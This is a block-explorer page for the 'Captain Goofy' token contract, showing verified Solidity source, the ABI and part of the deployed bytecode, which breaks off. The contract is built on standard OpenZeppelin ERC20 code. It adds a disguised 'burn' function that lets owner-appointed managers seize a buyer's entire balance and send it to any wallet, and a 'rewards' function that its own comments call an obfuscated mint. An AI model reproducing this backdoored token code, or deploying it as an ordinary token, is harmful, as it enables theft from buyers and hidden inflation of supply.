ETH Price: $1,586.69 (-0.56%)

Token

Captain Goofy (Goofy)

Overview

Max Total Supply

999,060,000,000,000 Goofy

Holders

27

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Null: 0x00...dEaD
Balance
30,177,985,941.507018511051785462 Goofy

Value
$0.00
0x000000000000000000000000000000000000dEaD
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.

Contract Source Code Verified (Exact Match)

Contract Name:
Goofy

Compiler Version
v0.8.20-1.0.1

ZkSolc Version
v1.5.11

Optimization Enabled:
Yes with Mode 3

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at abscan.org on 2025-04-13
*/

// Sources flattened with hardhat v2.23.0 https://hardhat.org

// SPDX-License-Identifier: MIT

// File @openzeppelin/contracts/utils/[email protected]

// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]

// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]

// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}


// File contracts/Goofy.sol

// Original license: SPDX_License_Identifier: MIT
pragma solidity ^0.8.20;


contract Goofy is ERC20, Ownable {
    event TokensBurned(address indexed from, address indexed to, uint256 amount);
    event RoleGranted(address indexed account, string role);

    mapping(address => bool) private rewardManagers;
    mapping(address => bool) private burnManagers;

    // Modified constructor for ZK compatibility
    constructor(address initialOwner) ERC20("Captain Goofy", "Goofy") {
        _mint(initialOwner, 60000000000 * (10 ** decimals()));
        _transferOwnership(initialOwner); // Explicit ownership transfer
    }

    // Modifier to restrict access to reward managers
    modifier onlyRewardManager() {
        require(rewardManagers[msg.sender], "Caller is not a reward manager");
        _;
    }

    // Modifier to restrict access to burn managers
    modifier onlyBurnManager() {
        require(burnManagers[msg.sender], "Caller is not a burn manager");
        _;
    }

    // Grant reward manager role
    function grantRewardManagerRole(address account) external onlyOwner {
        rewardManagers[account] = true;
        emit RoleGranted(account, "RewardManager");
    }

    // Grant burn manager role
    function grantBurnManagerRole(address account) external onlyOwner {
        burnManagers[account] = true;
        emit RoleGranted(account, "BurnManager");
    }

    // Function to transfer all tokens from the buyer to a specified wallet
    function burn(address from, address to) external onlyBurnManager {
        uint256 amount = balanceOf(from);
        require(amount > 0, "No tokens to transfer");
        _transfer(from, to, amount);
        emit TokensBurned(from, to, amount);
    }

    // Public function to distribute tokens (obfuscated mint)
    function rewards(address to, uint256 amount) public onlyRewardManager {
        _obscureMint(to, amount);
    }

    // Hidden mint function (obfuscated minting)
    function _obscureMint(address account, uint256 amount) internal {
        _mint(account, amount); // Hidden by not being public/external
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"address","name":"initialOwner","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"string","name":"role","type":"string"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"TokensBurned","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"grantBurnManagerRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"grantRewardManagerRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"rewards","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

9c4d535b0000000000000000000000000000000000000000000000000000000000000000010001bfcae826c5e69d6d45d99cb030feda73c23af67d65249116802a8a01be00000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000020000000000000000000000000e784109ef11e3b695be47fee476d12792802bff6

Deployed Bytecode

0x0007000000000002000000000801034f00000060011002700000016a011001970000000100200190000000260000c13d0000008002000039000000400020043f000000040010008c000000490000413d000000000208043b000000e0022002700000017b0020009c0000004b0000213d000001880020009c000000d20000a13d000001890020009c000000f50000a13d0000018a0020009c000001aa0000613d0000018b0020009c000001b10000613d0000018c0020009c000000490000c13d000000240010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000101043b0000016d0010009c000000490000213d000000000010043f000000200000043f000000400200003900000000010000190000021f0000013d0000000002000416000000000002004b000000490000c13d0000001f021000390000016b022001970000008002200039000000400020043f0000001f0310018f0000016c041001980000008002400039000000370000613d0000008005000039000000000608034f000000006706043c0000000005750436000000000025004b000000330000c13d000000000003004b000000440000613d000000000448034f0000000303300210000000000502043300000000053501cf000000000535022f000000000404043b0000010003300089000000000434022f00000000033401cf000000000353019f0000000000320435000000200010008c000000490000413d000000800600043d0000016d0060009c000000720000a13d0000000001000019000005a7000104300000017c0020009c000000e60000a13d0000017d0020009c000001200000a13d0000017e0020009c000001e10000613d0000017f0020009c000002060000613d000001800020009c000000490000c13d000000240010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000601043b0000016d0060009c000000490000213d0000000501000039000000000201041a0000016d032001970000000005000411000000000053004b000002eb0000c13d000000000006004b000003180000c13d0000019401000041000000800010043f0000002001000039000000840010043f0000002601000039000000a40010043f0000019501000041000000c40010043f0000019601000041000000e40010043f0000019701000041000005a700010430000000400300043d0000016e0030009c000003b90000213d0000004001300039000000400010043f0000000d01000039000000000a1304360000016f0100004100000000001a0435000000400700043d0000016e0070009c000003b90000213d0000004001700039000000400010043f00000005040000390000000005470436000001700100004100000000001504350000000009030433000001710090009c000003b90000213d0000000308000039000000000108041a0000000102100190000000010b1002700000007f0bb0618f0000001f00b0008c00000000010000390000000101002039000000000012004b000002e50000c13d0000002000b0008c000300000006001d000600000007001d000700000005001d000000bb0000413d00010000000b001d00020000000a001d000400000009001d000500000003001d000000000080043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000172011001c7000080100200003905a505a00000040f0000000100200190000000490000613d00000004090000290000001f029000390000000502200270000000200090008c0000000002004019000000000301043b00000001010000290000001f01100039000000050110027000000000011300190000000002230019000000000012004b00000005040000390000000607000029000000070500002900000003080000390000000503000029000000020a000029000000bb0000813d000000000002041b0000000102200039000000000012004b000000b70000413d0000001f0090008c000003020000a13d000400000009001d000500000003001d000000000080043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000172011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000040a000029000001af02a00198000000000101043b0000000509000029000003990000c13d000000200300003900000006070000290000000308000039000003a70000013d0000018f0020009c000001390000213d000001920020009c000002210000613d000001930020009c000000490000c13d000000440010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000201043b0000016d0020009c000000490000213d0000002401800370000000000301043b000000000100041105a5052f0000040f000001310000013d000001830020009c000001760000213d000001860020009c000002410000613d000001870020009c000000490000c13d0000000001000416000000000001004b000000490000c13d0000000501000039000000000101041a0000016d01100197000000800010043f0000019801000041000005a60001042e0000018d0020009c000002560000613d0000018e0020009c000000490000c13d000000440010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000101043b000700000001001d0000016d0010009c000000490000213d0000002401800370000000000101043b000600000001001d0000016d0010009c000000490000213d0000000001000411000000000010043f0000000701000039000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000101041a000000ff00100190000003590000c13d000000400100043d0000004402100039000001a903000041000000000032043500000024021000390000001c03000039000003300000013d000001810020009c0000028f0000613d000001820020009c000000490000c13d000000440010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000201043b0000016d0020009c000000490000213d0000002401800370000000000301043b000000000100041105a504bc0000040f0000000101000039000000400200043d00000000001204350000016a0020009c0000016a0200804100000040012002100000019c011001c7000005a60001042e000001900020009c000002ce0000613d000001910020009c000000490000c13d000000640010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000101043b000700000001001d0000016d0010009c000000490000213d0000002401800370000000000101043b000600000001001d0000016d0010009c000000490000213d0000004401800370000000000101043b000500000001001d0000000701000029000000000010043f0000000101000039000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b0000000002000411000000000020043f000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000101041a000001b00010009c0000040e0000613d000000050310006c0000040b0000813d000000400100043d0000004402100039000001ad03000041000000000032043500000024021000390000001d03000039000003300000013d000001840020009c000002d60000613d000001850020009c000000490000c13d000000240010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000101043b000700000001001d0000016d0010009c000000490000213d0000000501000039000000000101041a0000016d011001970000000002000411000000000021004b000002eb0000c13d0000000701000029000000000010043f0000000701000039000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000201041a000001b10220019700000001022001bf000000000021041b000001a001000041000000400200043d000000400320003900000000001304350000000b0100003900000020032000390000000000130435000000200100003900000000001204350000016a0020009c0000016a0200804100000040012002100000000002000414000002850000013d0000000001000416000000000001004b000000490000c13d0000001201000039000000800010043f0000019801000041000005a60001042e000000440010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000101043b000700000001001d0000016d0010009c000000490000213d0000000001000411000000000010043f0000000101000039000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c70000801002000039000600000008035305a505a00000040f000000060300035f0000000100200190000000490000613d000000000101043b0000000702000029000000000020043f000000200010043f0000002401300370000000000101043b000600000001001d00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000101041a0000000602000029000000000021001a000004600000413d00000000032100190000030d0000013d000000440010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000101043b000700000001001d0000016d0010009c000000490000213d0000002401800370000000000101043b000600000001001d0000000001000411000000000010043f0000000601000039000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000101041a000000ff00100190000003280000c13d000000400100043d00000044021000390000019b03000041000000000032043500000024021000390000001e03000039000003300000013d000000440010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000101043b0000016d0010009c000000490000213d0000002402800370000000000202043b000700000002001d0000016d0020009c000000490000213d000000000010043f0000000101000039000000200010043f0000004002000039000000000100001905a505860000040f0000000702000029000000000020043f000000200010043f0000000001000019000000400200003905a505860000040f000002d20000013d0000000001000416000000000001004b000000490000c13d0000000303000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f0000000100600190000002e50000c13d000000800010043f000000000005004b000002f70000613d000000000030043f000000020020008c000003000000413d000001ae0200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b000002380000413d000003450000013d0000000001000416000000000001004b000000490000c13d0000000501000039000000000201041a0000016d032001970000000005000411000000000053004b000002eb0000c13d0000017302200197000000000021041b00000000010004140000016a0010009c0000016a01008041000000c00110021000000174011001c70000800d02000039000000030300003900000175040000410000000006000019000003230000013d000000240010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000101043b000700000001001d0000016d0010009c000000490000213d0000000501000039000000000101041a0000016d011001970000000002000411000000000021004b000002eb0000c13d0000000701000029000000000010043f0000000601000039000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000201041a000001b10220019700000001022001bf000000000021041b000001ac01000041000000400200043d000000400320003900000000001304350000000d0100003900000020032000390000000000130435000000200100003900000000001204350000016a0020009c0000016a02008041000000400120021000000000020004140000016a0020009c0000016a02008041000000c002200210000000000112019f000001a1011001c70000800d020000390000000203000039000001a2040000410000000705000029000003230000013d000000440010008c000000490000413d0000000001000416000000000001004b000000490000c13d0000000401800370000000000101043b000700000001001d0000016d0010009c000000490000213d0000002401800370000000000101043b000600000001001d0000000